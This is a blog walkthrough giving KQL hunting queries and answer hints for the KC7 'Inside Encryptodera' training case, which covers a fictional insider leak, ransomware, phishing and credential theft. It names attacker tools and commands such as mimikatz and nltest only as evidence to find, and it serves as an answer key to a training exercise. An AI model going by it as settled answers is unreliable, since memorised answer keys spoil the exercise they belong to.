This post is a write-up or clues on how to resolve the KC7 investigation case of Inside Encryptodera . You can use it as a helpful guide when you encounter an obstacle, as it structured as a fill-in-the-blanks solution.

Section 1: Offensive Odor 👽"

Question 1: What is Barry’s role at the company?

Employees
| where name contains "Barry"
| project name , role

Question 2: What is Barry’s email address?

Employees
| where name contains "Barry"
| project name , role, email_addr

Question 3: What was the subject of the interesting email (the one on January 16th) that Barry sent?

Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where timestamp between (datetime(2024-01-16T00:00:00Z) .. datetime(2024-01-16T23:59:59Z))

Question 4: What was the role of the employees that received Barry’s email?

  1. Find the list of the recipients.
Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where subject == "I'm not coming in today. I'm sick of this place. We're all getting laid off anyway."
  1. Find the role.
Employees
| where email_addr in ("christopher_naylor@encryptoderafinancial.com", "michelle_collins@encryptoderafinancial.com", "jarrod_rodriguez@encryptoderafinancial.com")
| distinct role
  • Advanced operators:
Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where subject == "I'm not coming in today. I'm sick of this place. We're all getting laid off anyway."
| project recipient
| join kind=inner (
    Employees
    | project email_addr, role 
) on $left.recipient == $right.email_addr
| project recipient, role
| distinct role

Question 5: What was the role of the recipient of that email?

Email
| where subject == "YOU ARE A GREEDY PIG!!!! WHAT IS WRONG WITH YOU?????"

Employees
| where email_addr == "les_goh@encryptoderafinancial.com"
| project role

Question 6: What’s Barry’s IP address? (Paste the full IP address )

Employees
| where name contains "Barry"
| project ip_addr

Question 7: What was the complete URL that Barry was browsing on his computer regarding Cybersecurity Insiders on the afternoon of December 26th?(Paste the full url)

OutboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "Insiders"
| project url

Question 8: What website did he visit first on January 15th? (Paste the full URL)

OutboundNetworkEvents
| where src_ip == "10.10.0.1"
| where timestamp >= datetime(2024-01-15T00:00:00Z)
| top 1 by timestamp asc
| project url

Question 9: Could you provide the full URL for the website Barry searched for USB Flash Drives?

OutboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "usb"
| project url

Question 10: What “secret” document on business transactions did Barry download?

InboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "secret"
| project url

Question 11: What document (docx) did Barry download about salaries?

InboundNetworkEvents | where src_ip == “10.10.0.1” and url contains “salary” and url contains “docx” | project url

  • Advanced operators:
InboundNetworkEvents
| where src_ip == "10.10.0.1" and url contains "salary" and url contains "docx"
| extend parsed_url = parse_url(url)
| extend path_segments = split(parsed_url["Path"], "/")
| project FileName = tostring(path_segments[-1])

InboundNetworkEvents
| where src_ip == "10.10.0.1" and url contains "salary" and url contains "docx"
| extend fileName = tostring(split(parse_url(url)["Path"], "/")[-1])
| project fileName

Question 12: What document (zip) did Barry download to get this?

InboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "zip"
| extend fileName = tostring(split(parse_url(url)["Path"], "/")[-1])
| project fileName

Question 13: Do you know the password he used to zip the files?

We know the file name is Encryptodera_Proprietary_Algorithms.zip and by checking the ProcessEvents table, we observe the parent_process_hash is 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f

ProcessEvents
| where process_commandline contains "Encryptodera_Proprietary_Algorithms.zip"

I narrowed down the results by the day the event took place to shoren my results and find the password.

ProcessEvents
| where timestamp between (datetime(2024-01-16T00:00:00Z) .. datetime(2024-01-16T23:59:59Z))
| where hostname == "IGOY-DESKTOP"
| where parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f"

Question 14: What is the name of the drive on which Barry stored the final files?

Ans from question 13.

ProcessEvents
| where timestamp between (datetime(2024-01-16T00:00:00Z) .. datetime(2024-01-16T23:59:59Z))
| where hostname == "IGOY-DESKTOP"
| where parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f"

Section 2: Crypto Conquest

Question 1: What is the filename of this note?

Do you see it? It is the .txt file name.

FileCreationEvents
| where path contains "GIMME"
| distinct filename
| project filename

Question 2: What kind of attack is this?

Data encrypted for impact T1486 .

Question 3: On how many machines was this .txt file seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| distinct hostname
| count

Question 4: What time was the ransom note first seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp

Question 5: What is the hostname of the system where the ransom note was first seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp, hostname

Question 6: How many files were encrypted on this machine?

The question provided us with the hostname *UL8R-MACHINE *and the timestamp 2024-02-17. By running the following KQL we can review the activities:

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)

After adding | distinct filename to the KQL above I found two files files_go_byebye.exe and YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt that don’t end with .umadbro

This should allow you to find the answer but let me do a challenge to stretch my brain! From the filename column I found 3 find extension types .txt , .exe and .umadbro. Let’s assume there were more instead of scrolling I want an efficient way to get all the file types.

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)
| extend FileExtension = tostring(split(filename, ".")[-1])
| project  FileExtension
| summarize Count = count() by FileExtension
| sort by Count desc
  • extend FileExtension = tostring(split(filename, ".")[-1]):
    • In this line, we are using the extend operator to create a new column called FileExtension.
    • We are using the split function to split the filename by the dot (".") character. This will create an array of substrings where the dot is the delimiter.
    • The [-1] index is used to extract the last element of the array, which represents the file extension.
    • We are converting the extracted file extension to a string using tostring function and storing it in the FileExtension column.

Question 7: What is the extension that was used on the encrypted files?

The answer is the extension with the most count from the answer to question number 6.

Question 8: What command was run that references the ransomware extension?

The questions provides the KQL and the answer is the one in ‘process_commandline’.

Question 9: When did files_go_byebye.exe appear on this machine?

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where filename contains "byebye"
| project timestamp

Question 10: How many commands were run on UL8R-MACHINE during this timeframe?

The question provides the KQL and you can see the count or records or add | count at the end of the KQL.

Question 11: What domain does the encoded PowerShell reference?

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| distinct process_commandline

The question gave us a hint powershell. I added the following line to decread the amount of lines to analyze.

| where process_commandline contains "powershell"

Copy the base64 and decode it with your favorite tool, script or using Base64 Decode online .

Question 12: What command is run right before the base64-encoded PowerShell?

The KQL from the answer to question 11 would reveal the answer or we can get the timestamp by using the following KQL.

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp < datetime(2024-02-17T02:29:53Z)
| project timestamp , process_commandline
| top 1 by timestamp desc

Question 13: How many devices ran the gpupdate /force command?

ProcessEvents
| where process_commandline has "gpupdate /force"
| distinct hostname
| count

Question 14: How many machines at Encryptodera ran “systeminfo”?

ProcessEvents
| where process_commandline has "systeminfo"
| count

Question 15: What was the timestamp for the first time the command was run?

ProcessEvents
| where process_commandline has "systeminfo"
| top 1 by timestamp asc

Question 16: How many days elapsed between when the attackers ran discovery commands and when the ransomware attack started?

Calculate the date 🤯!

Question 17: What is the hostname of the device on which the attackers first ran systeminfo?

ProcessEvents
| where process_commandline contains "systeminfo"
| project timestamp , hostname
| top 1 by timestamp asc

Question 18: What was the full commandline used by the threat actor when running nltest /dclist? (paste the full commandline)

ProcessEvents
| where process_commandline contains "nltest /dclist"

Question 19: What is the full name of the .xlsx.exe file on 41QI-LAPTOP?

FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where path contains ".xlsx.exe"
| project filename

Question 20: What file shows up a few seconds after the .xlsx.exe file?

FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where timestamp > datetime(2024-02-01T08:50:12Z)
| top 1 by timestamp asc
| project timestamp , hostname, filename

Question 21: How many devices does screenconnect_client.exe appear on?

FileCreationEvents
| where filename contains "screenconnect_client.exe"
| count 

Email
| where link contains "xlsx.exe"
| distinct sender

Question 23: How many unusual emails were sent by Barry?

Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where timestamp > (datetime("2024-02-01"))
| distinct subject
| count

Question 24: Type got it once you’ve made a note of these recipients.

got it

Question 25: What IP was used to sign into Barry’s account on February 1st?

The AuthenticationEvents allows us to check filter the tables by the username. To find Barry’s user name we can locate it from the Employees table.

Employees
| where name contains "Barry"
| project name, username

AuthenticationEvents
| where username == "bashmelly"
| where timestamp between (datetime('2024-02-01T00:00:00Z') ..datetime('2024-02-01T23:59:59') )
| order by timestamp desc

Question 26: How many other accounts did that IP log into?

AuthenticationEvents
| where src_ip contains "143.38.175.105"

Question 27: How many IPs logged in to all 8 devices where the attacker ran systeminfo?

let hosts = ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| summarize dcount(hostname) by src_ip
| order by dcount_hostname desc

Question 28: What is the role of the employee who this IP address belongs to?

Employees
| where ip_addr == "10.10.0.138"
| project role

Question 29: How many successful logins were made from this IP?

AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| count

Question 30: What is the hostname of the server the attackers logged into?

AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| where hostname contains "server" and hostname !contains "mail"

Section 3: F in the chat

Question 1: What username was used to log into the DOMAIN_CONTROLLER_SERVER?

AuthenticationEvents
| where hostname == "DOMAIN_CONTROLLER_SERVER"
| project username

Question 2: What laptop did the lihenry_domain_admin account sign into?

AuthenticationEvents
| where username == "lihenry_domain_admin"
| project hostname

Just for Kqling!

let SusUserName = AuthenticationEvents
| where hostname == "DOMAIN_CONTROLLER_SERVER"
| project username;
AuthenticationEvents
| where username in (SusUserName)
| project hostname, username

Question 3: What is the MITRE ATT&CK ID for mimikatz?

MITRE ATT&amp;CK Mimikatz .

Question 4: Did the threat actor run mimikatz on this device? If so, enter the command line the attacker ran. If not, enter no.

ProcessEvents
| where process_commandline contains "mimikatz"
| distinct process_commandline

Question 5: Who does this device belong to? (Enter the employee’s name)

The question is asking about the device from question 4.

Employees
| where hostname == "GJ95-LAPTOP"
| project name

Question 6: Was Valerie Orozco targeted in the phishing emails sent from Barry Shmelly?

We all know! Yes.

Question 7: What is the name of the file that was sent to Valerie in the phishing email?

From the notes I know the sender email address KC7 Inside Encryptodera - Section 1: Offensive Odor .

Valerie’s email address is in the Employees table.

Employees
| where name contains "valerie Orozco"
| project email_addr

Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where recipient == "valerie_orozco@encryptoderafinancial.com"
| project link
| extend fileName = tostring(split(parse_url(link).Path, "/")[-1])
| project fileName

The expression | extend fileName = tostring(split(parse_url(link).Path, "/")[-1]) is used to extract the last part (the filename) from a URL in the link column.

  1. | extend fileName =

The extend operator adds a new column called fileName with the extracted filename as the value.

  1. tostring()

This converts the extracted value (which is the filename) to a string type.

  1. split(parse_url(link).Path, "/")

This splits the path into an array of strings, using / as the delimiter.

  1. parse_url(link).Path

This extracts the path portion of the URL from the link column.

  1. [-1]

This selects the last element of the array, which is the file name.

OutboundNetworkEvents
| where url has "Employee_Contact_List_Updated_March_2024.docx.exe"
| where src_ip == "10.10.0.18"

Question 9: How many different user accounts logged into Valerie’s machine?

AuthenticationEvents
| where hostname == "GJ95-LAPTOP"
| distinct username
| count

Question 10: How many unique hosts did this user account attempt to log into?

AuthenticationEvents
| where username == "systadmi_local_admin"
| distinct hostname
| count

Just for Kqling!

AuthenticationEvents
| where username == "systadmi_local_admin"
| distinct hostname
| count

Question 11: Which user NOT in an IT role was improperly using the systadmi_local_admin credentials? (This is likely a sign of compromise)

You Got this 👾

Question 12: When was Robin phished by Barry Shmelly’s account?

let employeeEmail = Employees
| where name == "Robin Kirby"
| project email_addr;
Email
| where recipient in (employeeEmail) and sender == "barry_shmelly@encryptoderafinancial.com"
| project timestamp

Community Help

Join Discord to discuss the module KC7 Discord #encryptodera .